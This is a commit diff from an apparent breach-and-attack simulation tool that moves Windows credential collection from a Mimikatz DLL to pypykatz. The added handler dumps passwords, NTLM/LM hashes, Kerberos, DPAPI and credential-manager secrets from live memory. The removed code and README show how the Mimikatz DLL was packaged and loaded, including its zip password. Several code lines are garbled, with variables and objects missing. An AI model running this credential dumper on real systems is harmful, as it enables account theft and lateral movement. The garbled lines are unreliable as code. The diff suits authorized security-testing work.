Merge pull request from guardicore/feature/pypykatz

Mimikatz dll to pypykatz refactor
This commit is contained in:
VakarisZ 2020-06-08 15:21:49 +03:00 committed by GitHub
commit 0ec5259540
No known key found for this signature in database
21 changed files with 232 additions and 316 deletions

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@ -29,8 +29,6 @@ $TRACEROUTE_32_BINARY_URL = $MONKEY_DOWNLOAD_URL + "traceroute32"
$MONKEY_ISLAND_DIR = Join-Path "\monkey" -ChildPath "monkey_island"
$MONKEY_DIR = Join-Path "\monkey" -ChildPath "infection_monkey"
$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\bin"
$MK32_DLL = ""
$MK64_DLL = ""
$TEMP_PYTHON_INSTALLER = ".\python.exe"
@ -44,6 +42,4 @@ $MONGODB_URL = "
$CPP_URL = ""
$NPM_URL = ""
$MK32_DLL_URL = ""
$MK64_DLL_URL = ""
$UPX_URL = ""

View File

@ -226,20 +226,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
Remove-Item $TEMP_UPX_ZIP
# Download mimikatz binaries
$mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL
if (!(Test-Path -Path $mk32_path))
"Downloading mimikatz 32 binary"
$webClient.DownloadFile($MK32_DLL_URL, $mk32_path)
$mk64_path = Join-Path -Path $binDir -ChildPath $MK64_DLL
if (!(Test-Path -Path $mk64_path))
"Downloading mimikatz 64 binary"
$webClient.DownloadFile($MK64_DLL_URL, $mk64_path)
# Download sambacry binaries
$samba_path = Join-Path -Path $monkey_home -ChildPath $SAMBA_BINARIES_DIR
$samba32_path = Join-Path -Path $samba_path -ChildPath $SAMBA_32_BINARY_NAME

View File

@ -39,9 +39,9 @@ class WmiExploiter(HostExploiter):
for user, password, lm_hash, ntlm_hash in creds:
password_hashed = self._config.hash_sensitive_data(password)
lm_hash_hashed = self._config.hash_sensitive_data(lm_hash)
mtlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash)
ntlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash)
creds_for_logging = "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): " \
"({},{},{},{})".format(user, password_hashed, lm_hash_hashed, mtlm_hash_hashed)
"({},{},{},{})".format(user, password_hashed, lm_hash_hashed, ntlm_hash_hashed)
LOG.debug(("Attempting to connect %r using WMI with " % + creds_for_logging)
wmi_connection = WmiTools.WmiConnection()

View File

@ -8,9 +8,6 @@ __author__ = 'itay.mizeretz'
block_cipher = None
# Name of zip file in monkey. That's the name of the file in the _MEI folder
def main():
a = Analysis([''],
@ -66,7 +63,6 @@ def process_datas(orig_datas):
datas = orig_datas
if is_windows():
datas = [i for i in datas if i[0].find('Include') < 0]
datas += [(MIMIKATZ_ZIP_NAME, get_mimikatz_zip_path(), 'BINARY')]
return datas
@ -118,9 +114,4 @@ def get_exe_icon():
return 'monkey.ico' if is_windows() else None
def get_mimikatz_zip_path():
mk_filename = '' if is_32_bit() else ''
return os.path.join(get_bin_folder(), mk_filename)
main() # We don't check if __main__ because this isn't the main script.

View File

@ -7,7 +7,6 @@ The monkey is composed of three separate parts.
- The Infection Monkey itself - PyInstaller compressed python archives
- Sambacry binaries - Two linux binaries, 32/64 bit.
- Mimikatz binaries - Two windows binaries, 32/64 bit.
- Traceroute binaries - Two linux binaries, 32/64bit.
## Windows
@ -28,7 +27,7 @@ The monkey is composed of three separate parts.
`pip install -r requirements.txt`
4. Download and extract UPX binary to monkey\infection_monkey\bin\upx.exe:
5. Build/Download Sambacry and Mimikatz binaries
5. Build/Download Sambacry
- Build/Download according to sections at the end of this readme.
- Place the binaries under monkey\infection_monkey\bin
6. To build the final exe:
@ -83,24 +82,6 @@ Sambacry requires two standalone binaries to execute remotely.
- 32bit: <>
- 64bit: <>
### Mimikatz
Mimikatz is required for the Monkey to be able to steal credentials on Windows. It's possible to either compile binaries from source (requires Visual Studio 2013 and up) or download them from our repository.
1. Build Mimikatz yourself
- Building mimikatz requires Visual Studio 2013 and up
- Clone our version of mimikatz from <>
- Build using Visual Studio.
- Put each version in a zip file
1. The zip should contain only the Mimikatz DLL named tmpzipfile123456.dll
2. It should be protected using the password 'VTQpsJPXgZuXhX6x3V84G'.
3. The zip file should be named accordingly.
4. Zipping with 7zip has been tested. Other zipping software may not work.
2. Download our pre-built mimikatz binaries
- Download both 32 and 64 bit zipped DLLs from <>
- Place them under [code location]\infection_monkey\bin
### Traceroute
Traceroute requires two standalone binaries to execute remotely.

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@ -17,3 +17,4 @@ wmi==1.4.9 ; sys_platform == 'win32'

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@ -105,6 +105,7 @@ class InfoCollector(object):
# we might be losing passwords in case of multiple reset attempts on same username
# or in case another collector already filled in a password for this user["credentials"][username]['password'] = password["credentials"][username]['username'] = username
if len(azure_creds) != 0:["Azure"] = {}["Azure"]['usernames'] = [cred[0] for cred in azure_creds]

View File

@ -1,129 +0,0 @@
import binascii
import ctypes
import logging
import socket
import zipfile
import infection_monkey.config
from common.utils.attack_utils import ScanStatus, UsageEnum
from infection_monkey.telemetry.attack.t1129_telem import T1129Telem
from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
from infection_monkey.pyinstaller_utils import get_binary_file_path, get_binaries_dir_path
__author__ = 'itay.mizeretz'
LOG = logging.getLogger(__name__)
class MimikatzCollector(object):
Password collection module for Windows using Mimikatz.
# Name of Mimikatz DLL. Must be name of file in Mimikatz zip.
MIMIKATZ_DLL_NAME = 'tmpzipfile123456.dll'
# Name of ZIP containing Mimikatz. Must be identical to one on monkey.spec
# Password to Mimikatz zip file
def __init__(self):
self._config = infection_monkey.config.WormConfiguration
self._isInit = False
self._dll = None
self._collect = None
self._get = None
def init_mimikatz(self):
with zipfile.ZipFile(get_binary_file_path(MimikatzCollector.MIMIKATZ_ZIP_NAME), 'r') as mimikatz_zip:
mimikatz_zip.extract(self.MIMIKATZ_DLL_NAME, path=get_binaries_dir_path(),
self._dll = ctypes.WinDLL(get_binary_file_path(self.MIMIKATZ_DLL_NAME))
collect_proto = ctypes.WINFUNCTYPE(ctypes.c_int)
get_proto = ctypes.WINFUNCTYPE(MimikatzCollector.LogonData)
get_text_output_proto = ctypes.WINFUNCTYPE(ctypes.c_wchar_p)
self._collect = collect_proto(("collect", self._dll))
self._get = get_proto(("get", self._dll))
self._get_text_output_proto = get_text_output_proto(("getTextOutput", self._dll))
self._isInit = True
status = ScanStatus.USED
except Exception:
LOG.exception("Error initializing mimikatz collector")
status = ScanStatus.SCANNED
T1106Telem(status, UsageEnum.MIMIKATZ_WINAPI).send()
T1129Telem(status, UsageEnum.MIMIKATZ).send()
def get_logon_info(self):
Gets the logon info from mimikatz.
Returns a dictionary of users with their known credentials.
"""'Getting mimikatz logon information')
if not self._isInit:
return {}
LOG.debug("Running mimikatz collector")
entry_count = self._collect()
logon_data_dictionary = {}
hostname = socket.gethostname()
self.mimikatz_text = self._get_text_output_proto()
for i in range(entry_count):
entry = self._get()
username = entry.username
password = entry.password
lm_hash = binascii.hexlify(bytearray(entry.lm_hash)).decode()
ntlm_hash = binascii.hexlify(bytearray(entry.ntlm_hash)).decode()
if 0 == len(password):
has_password = False
elif (username[-1] == '$') and (hostname.lower() == username[0:-1].lower()):
# Don't save the password of the host domain user (HOSTNAME$)
has_password = False
has_password = True
has_lm = ("00000000000000000000000000000000" != lm_hash)
has_ntlm = ("00000000000000000000000000000000" != ntlm_hash)
if username not in logon_data_dictionary:
logon_data_dictionary[username] = {}
if has_password:
logon_data_dictionary[username]["password"] = password
if has_lm:
logon_data_dictionary[username]["lm_hash"] = lm_hash
if has_ntlm:
logon_data_dictionary[username]["ntlm_hash"] = ntlm_hash
return logon_data_dictionary
except Exception:
LOG.exception("Error getting logon info")
return {}
def get_mimikatz_text(self):
return self.mimikatz_text
class LogonData(ctypes.Structure):
Logon data structure returned from mimikatz.
_fields_ = \
("username", ctypes.c_wchar * WINDOWS_MAX_USERNAME_PASS_LENGTH),
("password", ctypes.c_wchar * WINDOWS_MAX_USERNAME_PASS_LENGTH),
("lm_hash", ctypes.c_byte * LM_NTLM_HASH_LENGTH),
("ntlm_hash", ctypes.c_byte * LM_NTLM_HASH_LENGTH)

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@ -0,0 +1,25 @@
import logging
from typing import List
from infection_monkey.system_info.windows_cred_collector import pypykatz_handler
from infection_monkey.system_info.windows_cred_collector.windows_credentials import WindowsCredentials
LOG = logging.getLogger(__name__)
class MimikatzCredentialCollector(object):
def get_creds():
creds = pypykatz_handler.get_windows_creds()
return MimikatzCredentialCollector.cred_list_to_cred_dict(creds)
def cred_list_to_cred_dict(creds: List[WindowsCredentials]):
cred_dict = {}
for cred in creds:
# Lets not use "." and "$" in keys, because it will confuse mongo.
# Ideally we should refactor island not to use a dict and simply parse credential list.
key = cred.username.replace(".", ",").replace("$", "")
cred_dict.update({key: cred.to_dict()})
return cred_dict

View File

@ -0,0 +1,72 @@
import binascii
from typing import Dict, List, NewType, Any
from pypykatz.pypykatz import pypykatz
from infection_monkey.system_info.windows_cred_collector.windows_credentials import WindowsCredentials
CREDENTIAL_TYPES = ['msv_creds', 'wdigest_creds', 'ssp_creds', 'livessp_creds', 'dpapi_creds',
'kerberos_creds', 'credman_creds', 'tspkg_creds']
PypykatzCredential = NewType('PypykatzCredential', Dict)
def get_windows_creds() -> List[WindowsCredentials]:
pypy_handle = pypykatz.go_live()
logon_data = pypy_handle.to_dict()
windows_creds = _parse_pypykatz_results(logon_data)
return windows_creds
def _parse_pypykatz_results(pypykatz_data: Dict) -> List[WindowsCredentials]:
windows_creds = []
for session in pypykatz_data['logon_sessions'].values():
return windows_creds
def _get_creds_from_pypykatz_session(pypykatz_session: Dict) -> List[WindowsCredentials]:
windows_creds = []
for cred_type_key in CREDENTIAL_TYPES:
pypykatz_creds = pypykatz_session[cred_type_key]
return windows_creds
def _get_creds_from_pypykatz_creds(pypykatz_creds: List[PypykatzCredential]) -> List[WindowsCredentials]:
creds = _filter_empty_creds(pypykatz_creds)
return [_get_windows_cred(cred) for cred in creds]
def _filter_empty_creds(pypykatz_creds: List[PypykatzCredential]) -> List[PypykatzCredential]:
return [cred for cred in pypykatz_creds if not _is_cred_empty(cred)]
def _is_cred_empty(pypykatz_cred: PypykatzCredential):
password_empty = 'password' not in pypykatz_cred or not pypykatz_cred['password']
ntlm_hash_empty = 'NThash' not in pypykatz_cred or not pypykatz_cred['NThash']
lm_hash_empty = 'LMhash' not in pypykatz_cred or not pypykatz_cred['LMhash']
return password_empty and ntlm_hash_empty and lm_hash_empty
def _get_windows_cred(pypykatz_cred: PypykatzCredential):
password = ''
ntlm_hash = ''
lm_hash = ''
username = pypykatz_cred['username']
if 'password' in pypykatz_cred:
password = pypykatz_cred['password']
if 'NThash' in pypykatz_cred:
ntlm_hash = _hash_to_string(pypykatz_cred['NThash'])
if 'LMhash' in pypykatz_cred:
lm_hash = _hash_to_string(pypykatz_cred['LMhash'])
return WindowsCredentials(username=username,
def _hash_to_string(hash_: Any):
if type(hash_) == str:
return hash_
if type(hash_) == bytes:
return binascii.hexlify(bytearray(hash_)).decode()
raise Exception(f"Can't convert hash_ to string, unsupported hash_ type {type(hash_)}")

View File

@ -0,0 +1,83 @@
from unittest import TestCase
from infection_monkey.system_info.windows_cred_collector.pypykatz_handler import _get_creds_from_pypykatz_session
class TestPypykatzHandler(TestCase):
# Made up credentials, but structure of dict should be roughly the same
'authentication_id': 555555, 'session_id': 3, 'username': 'Monkey',
'domainname': 'ReAlDoMaIn', 'logon_server': 'ReAlDoMaIn',
'logon_time': '2020-06-02T04:53:45.256562+00:00',
'sid': 'S-1-6-25-260123139-3611579848-5589493929-3021', 'luid': 123086,
'msv_creds': [
{'username': 'monkey', 'domainname': 'ReAlDoMaIn',
'NThash': b'1\xb7<Y\xd7\xe0\xc0\x89\xc01\xd6\xcf\xe0\xd1j\xe9', 'LMHash': None,
'SHAHash': b'\x18\x90\xaf\xd8\x07\t\xda9\xa3\xee^kK\r2U\xbf\xef\x95`'}],
'wdigest_creds': [
{'credtype': 'wdigest', 'username': 'monkey', 'domainname': 'ReAlDoMaIn',
'password': 'canyoufindme', 'luid': 123086}],
'ssp_creds': [{'credtype': 'wdigest', 'username': 'monkey123', 'domainname': 'ReAlDoMaIn',
'password': 'canyoufindme123', 'luid': 123086}],
'livessp_creds': [{'credtype': 'wdigest', 'username': 'monk3y', 'domainname': 'ReAlDoMaIn',
'password': 'canyoufindm3', 'luid': 123086}],
'dpapi_creds': [
{'credtype': 'dpapi', 'key_guid': '9123-123ae123de4-121239-3123-421f',
'masterkey': '6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975ef051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9',
'sha1_masterkey': 'bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da', 'luid': 123086},
{'credtype': 'dpapi', 'key_guid': '9123-123ae123de4-121239-3123-421f',
'masterkey': '6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975ef051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9',
'sha1_masterkey': 'bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da', 'luid': 123086},
{'credtype': 'dpapi', 'key_guid': '9123-123ae123de4-121239-3123-421f',
'masterkey': '6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975ef051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9',
'sha1_masterkey': 'bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da', 'luid': 123086},
{'credtype': 'dpapi', 'key_guid': '9123-123ae123de4-121239-3123-421f',
'masterkey': '6e81d0cfd5e9ec083cfbdaf4d25b9cc9cc6b72947f5e80920034d1275d8613532025975ef051e891c30e6e9af6db54500fedfed1c968389bf6262c77fbaa68c9',
'sha1_masterkey': 'bbdabc3cd2f6bcbe3e2cee6ce4ce4cebcef4c6da', 'luid': 123086},
{'credtype': 'dpapi', 'key_guid': '9123-123ae123de4-121239-3123-421f'}],
'kerberos_creds': [
{'credtype': 'kerberos', 'username': 'monkey_kerb', 'password': None, 'domainname': 'ReAlDoMaIn',
'luid': 123086, 'tickets': []}],
'credman_creds': [
{'credtype': 'credman', 'username': 'monkey', 'domainname': '',
'password': 'canyoufindme2', 'luid': 123086},
{'credtype': 'credman', 'username': '', 'domainname': '',
'password': 'canyoufindme1', 'luid': 123086},
{'credtype': 'credman', 'username': 'test', 'domainname': 'test.test.ts', 'password': 'canyoufindit',
'luid': 123086}],
'tspkg_creds': []}
def test__get_creds_from_pypykatz_session(self):
results = _get_creds_from_pypykatz_session(TestPypykatzHandler.PYPYKATZ_SESSION)
test_dicts = [{'username': 'monkey',
'ntlm_hash': '31b73c59d7e0c089c031d6cfe0d16ae9',
'password': '',
'lm_hash': ''},
{'username': 'monkey',
'ntlm_hash': '',
'password': 'canyoufindme',
'lm_hash': ''},
{'username': 'monkey123',
'ntlm_hash': '',
'password': 'canyoufindme123',
'lm_hash': ''},
{'username': 'monk3y',
'ntlm_hash': '',
'password': 'canyoufindm3',
'lm_hash': ''},
{'username': 'monkey',
'ntlm_hash': '',
'password': 'canyoufindme2',
'lm_hash': ''},
{'username': '',
'ntlm_hash': '',
'password': 'canyoufindme1',
'lm_hash': ''},
{'username': 'test',
'ntlm_hash': '',
'password': 'canyoufindit',
'lm_hash': ''},
results = [result.to_dict() for result in results]
[self.assertTrue(test_dict in results) for test_dict in test_dicts]

View File

@ -0,0 +1,15 @@
from typing import Dict
class WindowsCredentials:
def __init__(self, username: str, password="", ntlm_hash="", lm_hash=""):
self.username = username
self.password = password
self.ntlm_hash = ntlm_hash
self.lm_hash = lm_hash
def to_dict(self) -> Dict:
return {'username': self.username,
'password': self.password,
'ntlm_hash': self.ntlm_hash,
'lm_hash': self.lm_hash}

View File

@ -2,12 +2,12 @@ import os
import logging
import sys
from infection_monkey.system_info.windows_cred_collector.mimikatz_cred_collector import MimikatzCredentialCollector
sys.coinit_flags = 0 # needed for proper destruction of the wmi python module
# noinspection PyPep8
import infection_monkey.config
# noinspection PyPep8
from infection_monkey.system_info.mimikatz_collector import MimikatzCollector
# noinspection PyPep8
from infection_monkey.system_info import InfoCollector
# noinspection PyPep8
from infection_monkey.system_info.wmi_consts import WMI_CLASSES
@ -61,12 +61,15 @@ class WindowsInfoCollector(InfoCollector):
LOG.debug('finished get_wmi_info')
def get_mimikatz_info(self):
mimikatz_collector = MimikatzCollector()
mimikatz_info = mimikatz_collector.get_logon_info()
if mimikatz_info:
if "credentials" in["credentials"].update(mimikatz_info)["mimikatz"] = mimikatz_collector.get_mimikatz_text()'Mimikatz info gathered successfully')
else:'No mimikatz info was gathered')"Gathering mimikatz info")
credentials = MimikatzCredentialCollector.get_creds()
if credentials:
if "credentials" in["credentials"].update(credentials)["mimikatz"] = credentials'Mimikatz info gathered successfully')
else:'No mimikatz info was gathered')
except Exception as e:"Mimikatz credential collector failed: {e}")

View File

@ -1,51 +0,0 @@
__author__ = 'maor.rayzin'
class MimikatzSecrets(object):
def __init__(self):
# Static class
def extract_sam_secrets(mim_string, users_dict):
users_secrets = mim_string.split("\n42.")[1].split("\nSAMKey :")[1].split("\n\n")[1:]
if mim_string.count("\n42.") != 2:
return {}
for sam_user_txt in users_secrets:
sam_user = dict([list(map(str.strip, line.split(":"))) for line in
[l for l in sam_user_txt.splitlines() if l.count(":") == 1]])
username = sam_user.get("User")
users_dict[username] = {}
ntlm = sam_user.get("NTLM")
if not ntlm or "[hashed secret]" not in ntlm:
users_dict[username]['SAM'] = ntlm.replace("[hashed secret]", "").strip()
def extract_ntlm_secrets(mim_string, users_dict):
if mim_string.count("\n42.") != 2:
return {}
ntds_users = mim_string.split("\n42.")[2].split("\nRID :")[1:]
for ntds_user_txt in ntds_users:
user = ntds_user_txt.split("User :")[1].splitlines()[0].replace("User :", "").strip()
ntlm = ntds_user_txt.split("* Primary\n NTLM :")[1].splitlines()[0].replace("NTLM :", "").strip()
ntlm = ntlm.replace("[hashed secret]", "").strip()
users_dict[user] = {}
if ntlm:
users_dict[user]['ntlm'] = ntlm
def extract_secrets_from_mimikatz(mim_string):
users_dict = {}
MimikatzSecrets.extract_sam_secrets(mim_string, users_dict)
MimikatzSecrets.extract_ntlm_secrets(mim_string, users_dict)
return users_dict

View File

@ -184,10 +184,13 @@ class ReportService:
origin = NodeService.get_monkey_by_guid(telem['monkey_guid'])['hostname']
for user in monkey_creds:
for pass_type in monkey_creds[user]:
for pass_type in PASS_TYPE_DICT:
if pass_type not in monkey_creds[user] or not monkey_creds[user][pass_type]:
username = monkey_creds[user]['username'] if 'username' in monkey_creds[user] else user
cred_row = \
'username': user.replace(',', '.'),
'username': username,
'type': PASS_TYPE_DICT[pass_type],
'origin': origin
@ -729,8 +732,7 @@ class ReportService:
'stolen_creds': ReportService.get_stolen_creds(),
'azure_passwords': ReportService.get_azure_creds(),
'ssh_keys': ReportService.get_ssh_keys(),
'strong_users': PTHReportService.get_strong_users_on_crit_details(),
'pth_map': PTHReportService.get_pth_map()
'strong_users': PTHReportService.get_strong_users_on_crit_details()

View File

@ -1,7 +1,6 @@
import logging
from import encryptor
from import mimikatz_utils
from import ConfigService
from import NodeService
from import \
@ -16,7 +15,7 @@ def process_system_info_telemetry(telemetry_json):
telemetry_processing_stages = [
@ -83,20 +82,18 @@ def replace_user_dot_with_comma(creds):
def add_system_info_creds_to_config(creds):
for user in creds:
if 'password' in creds[user]:
if 'password' in creds[user] and creds[user]['password']:
if 'lm_hash' in creds[user]:
if 'lm_hash' in creds[user] and creds[user]['lm_hash']:
if 'ntlm_hash' in creds[user]:
if 'ntlm_hash' in creds[user] and creds[user]['ntlm_hash']:
def process_mimikatz_and_wmi_info(telemetry_json):
def process_wmi_info(telemetry_json):
users_secrets = {}
if 'mimikatz' in telemetry_json['data']:
users_secrets = mimikatz_utils.MimikatzSecrets. \
extract_secrets_from_mimikatz(telemetry_json['data'].get('mimikatz', ''))
if 'wmi' in telemetry_json['data']:
monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']).get('_id')
wmi_handler = WMIHandler(monkey_id, telemetry_json['data']['wmi'], users_secrets)

View File

@ -69,7 +69,7 @@ class WMIHandler(object):
base_entity = self.build_entity_document(user)
base_entity = self.build_entity_document(user, self.monkey_id)
base_entity['NTLM_secret'] = self.users_secrets.get(base_entity['name'], {}).get('ntlm')
base_entity['NTLM_secret'] = self.users_secrets.get(base_entity['name'], {}).get('ntlm_hash')
base_entity['SAM_secret'] = self.users_secrets.get(base_entity['name'], {}).get('sam')
base_entity['secret_location'] = []

View File

@ -1,52 +0,0 @@
import React from 'react';
import {ReactiveGraph} from 'components/reactive-graph/ReactiveGraph';
import AuthComponent from '../AuthComponent';
import {optionsPth} from '../map/MapOptions';
import {Col} from 'react-bootstrap';
class PassTheHashMapPageComponent extends AuthComponent {
constructor(props) {
this.state = {
graph: props.graph,
selected: null,
selectedType: null
events = {
select: event => this.selectionChanged(event)
selectionChanged(event) {
if (event.nodes.length === 1) {
let displayedNode = this.state.graph.nodes.find(
function (node) {
return node['id'] === event.nodes[0];
this.setState({selected: displayedNode, selectedType: 'node'})
} else if (event.edges.length === 1) {
let displayedEdge = this.state.graph.edges.find(
function (edge) {
return edge['id'] === event.edges[0];
this.setState({selected: displayedEdge, selectedType: 'edge'});
} else {
this.setState({selected: null, selectedType: null});
render() {
return (
<Col xs={12}>
<div style={{height: '70vh'}}>
<ReactiveGraph graph={this.state.graph} options={optionsPth} events={}/>
export default PassTheHashMapPageComponent;

View File

@ -420,10 +420,6 @@ class ReportPageComponent extends AuthComponent {
<PostBreach data={}/>
<div style={{position: 'relative', height: '80vh'}}>
<div style={{marginBottom: '20px'}}>
<StolenPasswords data={}/>

View File

@ -44,11 +44,10 @@ class ScannedServersComponent extends React.Component {
return (
The Monkey discovered
<span className="label label-danger">{scannedServicesAmount}</span>
open {Pluralize('service', scannedServicesAmount)}
<span className="label label-warning">{scannedMachinesCount}</span>
The Monkey discovered&nbsp;
<span className="label label-danger">{scannedServicesAmount}</span> open&nbsp;
{Pluralize('service', scannedServicesAmount)} on&nbsp;
<span className="label label-warning">{scannedMachinesCount}</span>&nbsp;
{Pluralize('machine', scannedMachinesCount)}:
<div className="data-table-container">